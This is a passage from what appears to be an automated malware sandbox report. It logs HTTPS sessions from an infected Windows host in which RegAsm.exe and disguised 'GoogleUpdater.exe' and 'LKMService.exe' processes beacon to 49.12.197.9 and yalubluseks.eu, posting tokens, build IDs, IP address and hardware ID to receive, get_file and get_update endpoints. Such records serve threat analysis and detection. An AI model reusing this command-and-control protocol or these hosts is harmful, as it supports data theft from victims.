                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 829
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:56 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 65 34 36 33 62 63 63 64 39 63 35 36 65 38 38 66 63 61 66 37 63 61 36 63 39 30 65 35 38 38 34 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="token"3e463bccd9c56e88fcaf7ca6c90e5884------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------AEGIJKEHCAKFCAKFHDAACont
                                                                                                                                                                                                                                          2024-10-02 12:44:57 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:57 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:44:57 UTC15INData Raw: 35 0d 0a 62 6c 6f 63 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 5block0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          107192.168.2.65864649.12.197.9443340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:56 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----AEGIJKEHCAKFCAKFHDAA
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 829
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:56 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 31 30 61 61 65 39 36 37 33 32 61 38 66 30 34 32 30 30 66 39 65 31 36 63 66 33 34 64 38 65 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="token"5710aae96732a8f04200f9e16cf34d8e------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------AEGIJKEHCAKFCAKFHDAACont
                                                                                                                                                                                                                                          2024-10-02 12:44:57 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:57 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:44:57 UTC15INData Raw: 35 0d 0a 62 6c 6f 63 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 5block0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          108192.168.2.658650172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:01 UTC143OUTPOST /receive.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:45:01 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:45:01 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63
                                                                                                                                                                                                                                          Data Ascii: ip=8.46.123.33&hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc
                                                                                                                                                                                                                                          2024-10-02 12:45:02 UTC609INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:02 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZL5HYSYkVgxO6%2BoSrI7DfCuOUl87SJ%2F%2BlpKRRnXDUMB6KQFDwwxF4DqPUfriqNb9azwJ3ktITg1QLi86fhJXDNaClBIAQDP9%2B1IgacxJYrldpCIJqKyxNUQKctP6MLThuQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9867ccac336-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          109192.168.2.658652172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:03 UTC144OUTPOST /get_file.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:45:03 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:45:03 UTC84OUTData Raw: 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc&ip=8.46.123.33
                                                                                                                                                                                                                                          2024-10-02 12:45:03 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:03 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0LIF%2BSj29vSs06aCruiSqJiLLAEZPqFvjh5robMT1%2BsWnUvkx3MJRTlqVazg7tthn9E%2FnYKORt%2BeiBVMnrqex8hzT1ROVEtcZFHex5NBNIlPbZsR%2BIoUI5BX4c%2Fy9w1J%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9906ac572b7-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          110192.168.2.658653172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:04 UTC146OUTPOST /get_update.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:45:04 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:45:04 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                                                                                                                                                                                                                                          Data Ascii: current_version=0.3
                                                                                                                                                                                                                                          2024-10-02 12:45:04 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:04 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YoxqGmLBzsyBed93R6x5MaofzYWk6T23%2FI5fY2Z%2BtBywWmwVzuO5vqGGlkhmTeqN%2FRrVGEA%2BOCcJdjSfKmM3YlrWgrob2rRhsev5GkBfm5QW8nK4%2FJOX6Po8oELGQlyfHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c996facd41f2-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          111192.168.2.658656172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:05 UTC143OUTPOST /receive.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:45:05 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63
                                                                                                                                                                                                                                          Data Ascii: ip=8.46.123.33&hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc
                                                                                                                                                                                                                                          2024-10-02 12:45:06 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:45:06 UTC607INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:06 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=igQ%2BtyT8vCJevt9WnKa21l3ALIpVVxYOHAbo9oNmbGFihIPiXT3%2FLTxd9PXZLg8qB8HNrypqrUPdWAh7a%2F4lA1aIglTCAcaV1C6rrav9qK3skOo5OYVdO8gcJMkK6BTneA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9a0b8aa6a57-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          112192.168.2.658657172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:06 UTC143OUTPOST /receive.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:45:06 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63
                                                                                                                                                                                                                                          Data Ascii: ip=8.46.123.33&hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc
                                                                                                                                                                                                                                          2024-10-02 12:45:06 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:45:06 UTC609INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:06 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PKAUh0%2FoN82pwOYViG3xwsdQeAUamYuQ5HbKuQi38beaLEMbmN%2BpddRkXR1rOoAo0%2FXmXzLnCQhC2POdY%2BlH56Rg2BSXpGkCEzi1HyZD5tvXhTqL8m0QpfHh4QbM11vDDg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9a24fde4362-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          113192.168.2.658660172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:07 UTC144OUTPOST /get_file.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:45:07 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:45:07 UTC84OUTData Raw: 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc&ip=8.46.123.33
                                                                                                                                                                                                                                          2024-10-02 12:45:07 UTC603INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:07 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=63MYqmnKVOQalcPuIxwdj6xx9XBWpSr%2FUqK74cR5BDLom8sN6NK6914995MlGqwY4iz5ptOmffc91i7L7FHM3uMlQaZq3o3U43lmPRcOPvXOPp6Y78PP58VGccAusqE8qw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9a90b341a2c-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          114192.168.2.658661172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:07 UTC144OUTPOST /get_file.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:45:07 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:45:07 UTC84OUTData Raw: 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc&ip=8.46.123.33
                                                                                                                                                                                                                                          2024-10-02 12:45:07 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:07 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wr0nofr8%2BWGpa8Mmd%2BKjnTkCdN2vuTXwIHVfvPb1RVZCCX%2Fa01FSh7gRkJnz9W4sd1Pi8%2BeZAEHOxyme6fy4Al7gX7OYewL7spSY%2BMVt9MV4VSwlSRgcOVYnkMoFzQ8ClA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9aa8a774372-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          115192.168.2.658662172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:08 UTC146OUTPOST /get_update.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:45:08 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:45:08 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                                                                                                                                                                                                                                          Data Ascii: current_version=0.3
                                                                                                                                                                                                                                          2024-10-02 12:45:08 UTC607INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:08 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NzziQqWxbpCNL1h3KF2JB8k1XevZR0oQXyp4mVKIsnyqxDvXC8SCYKxHj9a70RjnUWocuyVv9oc%2BIDCAVMIHNqOh32e0BieyaUDCir6%2Bh7IMQiyx818V6Czq6qXahf%2BZ7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9ade9c68c42-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          116192.168.2.658663172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:08 UTC146OUTPOST /get_update.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:45:08 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:45:08 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                                                                                                                                                                                                                                          Data Ascii: current_version=0.3
                                                                                                                                                                                                                                          2024-10-02 12:45:09 UTC601INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:09 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QHXfn5abENoxoJbORkN0MsM4E69XFuPxdVQXDIpZWRf3nZ75LSThpm91Se2Q4Jt4HbvqTaCgcActPSeTDPGpyy0HNALhzfdtm0WKLpEaK577LgzxM71ZVzPgddXBfYGPqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9b17ebdde95-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          117192.168.2.658667172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:10 UTC143OUTPOST /receive.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:45:10 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63
                                                                                                                                                                                                                                          Data Ascii: ip=8.46.123.33&hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc
                                                                                                                                                                                                                                          2024-10-02 12:45:10 UTC25INHTTP/1.1 100 Continue


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          118192.168.2.658669172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:13 UTC143OUTPOST /receive.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:45:14 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:45:14 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63
